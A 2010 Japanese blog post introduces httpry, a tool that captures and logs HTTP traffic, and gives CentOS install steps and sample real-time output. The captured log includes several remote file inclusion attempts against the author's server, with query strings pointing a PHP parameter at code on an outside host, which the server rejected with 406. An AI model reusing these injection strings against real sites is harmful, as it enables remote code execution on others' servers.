- blogs:
- cles::blog
2010/08/01
httpry で http のアクセスをリアルタイムに見る
networking
SANS ISCで「Web Traffic Analysis with httpry」というエントリで紹介されているツールが興味深かったのでメモ。ここで出てくるhttpryというツールはHTTPに関する通信をパケットキャプチャして、ファイルに保存したり、リアルタイムで眺めたりできるツールです。基本的にはtcpdumpのようなツールですが、HTTPの部分だけ選択的に取得できるので、HTTPだけパケットキャプチャしたい場合には便利そうです。
httpry is a specialized packet sniffer designed for displaying and logging HTTP traffic. It is not intended to perform analysis itself, but to capture, parse, and log the traffic for later analysis. It can be run in real-time displaying the traffic as it is parsed, or as a daemon process that logs to an output file. It is written to be as lightweight and flexible as possible, so that it can be easily adaptable to different applications.
CentOSにインストールしたい場合にはlibpcap libpcap-develをインストールしておく必要があるようです。
# yum install libpcap libpcap-devel
# make
# make install
こんな感じでキャプチャした情報を表示することができます。
ちなみに表示する内容については-fオプションでカスタマイズ出来ます。
# httpry -i eth0
httpry version 0.1.5 -- HTTP logging and information retrieval tool
Copyright (c) 2005-2009 Jason Bittel <jason.bittel@gmail.com>
Starting capture on eth0 interface
2010-08-01 21:37:46 72.14.203.167 219.94.197.99 < - - - HTTP/1.0 200 OK
2010-08-01 21:37:46 219.94.197.99 66.249.69.49 < - - - HTTP/1.1 200 OK
2010-08-01 21:37:53 207.46.12.236 219.94.197.99 > GET blog.cles.jp /category/32/archive/2009-09-12 HTTP/1.1 - -
2010-08-01 21:37:53 219.94.197.99 207.46.12.236 < - - - HTTP/1.1 200 OK
2010-08-01 21:37:53 222.236.47.182 219.94.197.99 > GET blog.cles.jp /archive//path/books/mybooks.php?home=http://phamsight.com/docs/images/head?? HTTP/1.1 - -
2010-08-01 21:37:53 219.94.197.99 222.236.47.182 < - - - HTTP/1.1 406 Not Acceptable
2010-08-01 21:37:53 222.236.47.182 219.94.197.99 > GET blog.cles.jp /archive/1/2006-07/page//path/books/mybooks.php?home=http://phamsight.com/docs/images/head?? HTTP/1.1 - -
2010-08-01 21:37:53 219.94.197.99 222.236.47.182 < - - - HTTP/1.1 406 Not Acceptable
2010-08-01 21:37:53 222.236.47.182 219.94.197.99 > GET blog.cles.jp //path/books/mybooks.php?home=http://phamsight.com/docs/images/head?? HTTP/1.1 - -
2010-08-01 21:37:53 219.94.197.99 222.236.47.182 < - - - HTTP/1.1 406 Not Acceptable
2010-08-01 21:37:53 222.236.47.182 219.94.197.99 > GET blog.cles.jp /archive/1/2006-07//path/books/mybooks.php?home=http://phamsight.com/docs/images/head?? HTTP/1.1 - -
2010-08-01 21:37:53 219.94.197.99 222.236.47.182 < - - - HTTP/1.1 406 Not Acceptable
2010-08-01 21:37:53 222.236.47.182 219.94.197.99 > GET blog.cles.jp /archive/1/2006-07/page/4%20%20//path/books/mybooks.php?home=http://phamsight.com/docs/images/head?? HTTP/1.1 - -
2010-08-01 21:37:53 219.94.197.99 222.236.47.182 < - - - HTTP/1.1 406 Not Acceptable
2010-08-01 21:37:53 222.236.47.182 219.94.197.99 > GET blog.cles.jp /archive/1//path/books/mybooks.php?home=http://phamsight.com/docs/images/head?? HTTP/1.1 - -
2010-08-01 21:37:53 219.94.197.99 222.236.47.182 < - - - HTTP/1.1 406 Not Acceptable
2010-08-01 21:37:55 207.46.12.236 219.94.197.99 > GET blog.cles.jp /archive/1/2006-1-14 HTTP/1.1 - -
2010-08-01 21:37:55 122.133.97.133 219.94.197.99 > GET blog.cles.jp /favicon.ico HTTP/1.1 - -
2010-08-01 21:37:55 219.94.197.99 122.133.97.133 < - - - HTTP/1.1 200 OK
2010-08-01 21:37:55 219.94.197.99 207.46.12.236 < - - - HTTP/1.1 200 OK
Caught SIGINT, shutting down...
134 packets received, 0 packets dropped, 20 http packets parsed
423.2 packets/min, 75.8 http packets/min
偶然ですが、ちょうどおかしなトラフィック(多分、リモートコードインジェクション)に対して、サーバが406 Not Acceptableを返している様子が見えますね。
このようにhttpサーバの設定の確認なんかには便利に使えそうです。
トラックバックについて
Trackback URL:
お気軽にどうぞ。トラックバック前にポリシーをお読みください。[policy]
このエントリへのTrackbackにはこのURLが必要です→https://blog.cles.jp/item/3707
Trackbacks
このエントリにトラックバックはありません
Comments
愛のあるツッコミをお気軽にどうぞ。[policy]
古いエントリについてはコメント制御しているため、即時に反映されないことがあります。
古いエントリについてはコメント制御しているため、即時に反映されないことがあります。
コメントはありません
Comments Form
コメントは承認後の表示となります。
OpenIDでログインすると、即時に公開されます。
OpenID を使ってログインすることができます。
サイト内検索
検索ワードランキング
へぇが多いエントリ
閲覧数が多いエントリ
1 . アーロンチェアのポスチャーフィットを修理(114438)
2 . 福岡銀がデマの投稿者への刑事告訴を検討中(112957)
3 . 年次の人間ドックへ(112381)
4 . 2023 年分の確定申告完了!(1つめ)(111951)
5 . 三菱鉛筆がラミーを買収(111824)
2 . 福岡銀がデマの投稿者への刑事告訴を検討中(112957)
3 . 年次の人間ドックへ(112381)
4 . 2023 年分の確定申告完了!(1つめ)(111951)
5 . 三菱鉛筆がラミーを買収(111824)
cles::blogについて
Referrers
22045586
(W:8724 Y:2075 T:4409)
